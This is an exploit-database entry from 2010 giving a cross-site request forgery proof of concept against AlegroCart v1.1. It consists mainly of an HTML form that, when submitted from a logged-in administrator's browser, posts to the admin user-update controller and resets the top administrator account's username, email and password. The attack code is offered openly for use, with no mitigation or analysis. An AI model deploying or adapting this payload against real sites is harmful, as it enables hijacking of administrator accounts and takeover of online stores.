exploit-db-mirror/exploits/php/webapps/11311.txt

[#]----------------------------------------------------------------[#]
#
# [+] Home Of AlegroCart v1.1 - [ Xsrf] Change Administrator Password
#
# // Author Info
# [x] Author: The.Morpheus
# [x] Contact: fats0L@windowslive.com<mailto:fats0L@windowslive.com>
# [x] Thanks: Türksec.&#304;nfo ~ Nd And Tg Tayfa :P
# [x] Date : 01.02.2010
#
[#]-------------------------------------------------------------------------------------------[#]

# Download : http://forum.alegrocart.com/viewtopic.php?f=8&t=4

# [x] Exploit :
#
# [ XSRF ]
#
# [ Login ]
# http://[server]/[path]/admin/
#
# // Start XSRF
|-------------------------------------------------------------------------------|

<form action="http://server/admin/?controller=user&user_id=1&action=update;action=update" method="post" enctype="multipart/form-data" id="form">
width="185"><span class="required">*</span> Username:</td>
<input type="text" name="username" value="admin">
<span class="required">*</span> First Name:</td>
<input type="text" name="firstname" value="admin">
<span class="required">*</span> Last Name:</td>
<input type="text" name="lastname" value="admin">
<td>E-Mail:</td>
<input type="text" name="email" value="admin"></td>
<td>User Group:</td>
<td><select name="user_group_id">
<option value="1" selected>Top Administrator</option>
</select></td>
<td>Password:</td>
<input type="password" name="password" value="" >
<td>Confirm:</td>
<input type="password" name="confirm" value="">
</form>


|-------------------------------------------------------------------------------|
# // End of attack ~
#
[#]------------------------------------------------------------------------------------------[#]